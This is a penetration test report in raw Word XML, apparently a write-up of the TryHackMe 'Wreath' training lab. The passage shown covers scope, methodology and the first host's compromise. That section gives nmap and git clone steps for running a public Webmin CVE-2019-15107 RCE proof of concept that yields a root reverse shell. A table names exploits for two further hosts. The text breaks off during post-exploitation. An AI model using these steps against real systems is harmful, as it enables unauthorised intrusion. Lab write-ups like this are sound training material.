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rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TESTING REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111827"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">TryHackMe — Wreath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="500"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Internal Network Compromise: Multi-Host Linux &amp; Windows Pivoting Chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared for: Educational / CTF Documentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Engagement Type: Simulated Internal Red Team Assessment (TryHackMe Lab)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Classification: TLP:CLEAR — Lab Environment Only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: September 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Legal &amp; Ethical Notice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This report documents activity performed exclusively against the TryHackMe "Wreath" room, a purpose-built, isolated lab environment designed for authorized security training. All hosts, credentials, and vulnerabilities described are part of the intentionally vulnerable lab infrastructure. None of the techniques in this document were used against any system without explicit authorization. This report is intended strictly for educational and professional development purposes in penetration testing and red teaming.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Wreath engagement simulates a realistic internal penetration test against a small corporate network consisting of three hosts: an internet-facing CentOS/Webmin server, an internal Windows server running GitStack, and an internal Windows workstation belonging to a user named Thomas. The assessment demonstrates a complete attack chain — from initial external foothold, through internal network pivoting across two additional hops, to full domain-adjacent compromise of all three hosts, including SYSTEM-level access and credential extraction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The engagement is representative of common real-world weaknesses: unpatched third-party web management software, outdated version-control tooling exposed internally, weak file-upload validation in a custom web application, and an insecure Windows service configuration (unquoted service path). Each of these issues was chained together, illustrating how a single external vulnerability can cascade into full internal network compromise when internal segmentation, patching, and hardening are insufficient.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Overall risk rating: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical — full compromise of all in-scope hosts was achieved, including domain-adjacent SYSTEM privileges and clear-text credential recovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 Compromised Hosts Overview</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1800"/>
        <w:gridCol w:w="3200"/>
        <w:gridCol w:w="2200"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="1F2937" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3300"/>
            <w:shd w:fill="1F2937" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="1F2937" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="1F2937" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="1F2937" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Final Privilege</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Host 1 (.200)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Public-facing web/Webmin server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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CentOS Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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CVE-2019-15107 (Webmin unauth RCE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Host 2 (.150)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Internal GitStack / source-control server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Windows Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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EDB-ID 43777 (GitStack unauth RCE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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NT AUTHORITY\SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Host 3 (.100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Thomas' Windows workstation (AV-protected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Windows 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Custom web app file-upload RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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NT AUTHORITY\SYSTEM (via unquoted service path)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Scope &amp; Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Objectives of this engagement:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Gain an initial foothold on the externally reachable CentOS host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate the internal network that is not directly reachable from the attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pivot through compromised hosts to reach internal-only systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Compromise the internal GitStack server and escalate to the highest available privilege.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Harvest and crack credentials to support lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify and exploit a custom web application vulnerability to reach the final, AV-protected workstation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalate privileges locally on the final host and extract credential material for full compromise validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment followed a standard, cyclical penetration testing methodology, repeated at each new network segment reached: Reconnaissance → Enumeration → Exploitation → Post-Exploitation → Privilege Escalation → Pivoting → (repeat). This mirrors real-world internal assessments where each compromised host becomes a new vantage point rather than a final objective.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2563EB" w:sz="4"/>
          <w:left w:val="single" w:color="2563EB" w:sz="24"/>
          <w:bottom w:val="single" w:color="2563EB" w:sz="4"/>
          <w:right w:val="single" w:color="2563EB" w:sz="4"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F5F5F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="220"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="220"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2563EB"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker mindset applied throughout:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="276"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Every host was treated not just as a target to "get root/SYSTEM" on, but as a pivot point: SSH keys, cached credentials, reachable subnets, and installed tooling were all inventoried before moving on, exactly as an attacker would to maximize lateral movement opportunities with minimal noise.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Host 1 — CentOS / Webmin Server (10.200.X.200)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A full TCP port scan across the first 15,000 ports was run against the external host to avoid missing services on non-standard ports, combined with version detection and default NSE scripts:</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap -p- 1-15000 -sV -sC -oN 15000-ports 10.200.80.200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Findings included: OpenSSH, an HTTP service on port 80 issuing a redirect to https://thomaswreath.thm (added to /etc/hosts for resolution), HTTPS on 443, and — critically — Webmin (MiniServ) on port 10000.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Vulnerability Identification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Webmin version fingerprinting identified a build vulnerable to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2019-15107</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, an unauthenticated command injection in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">password_change.cgi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint via the "old" parameter, allowing arbitrary command execution as the user running the Webmin service (root, in this configuration).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A public proof-of-concept for CVE-2019-15107 was cloned and executed against the target:</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0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">git clone https://github.com/MuirlandOracle/CVE-2019-15107</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">cd CVE-2019-15107</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">pip3 install -r requirements.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">./CVE-2019-15107.py 10.200.80.200</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 Inside the tool:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="264"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">shell        # upgrades to a full interactive reverse shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit confirmed remote code execution as root — the highest possible privilege on a Linux host — without any authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.4 Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With root access established, the following high-value artifacts were collected to support further access:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
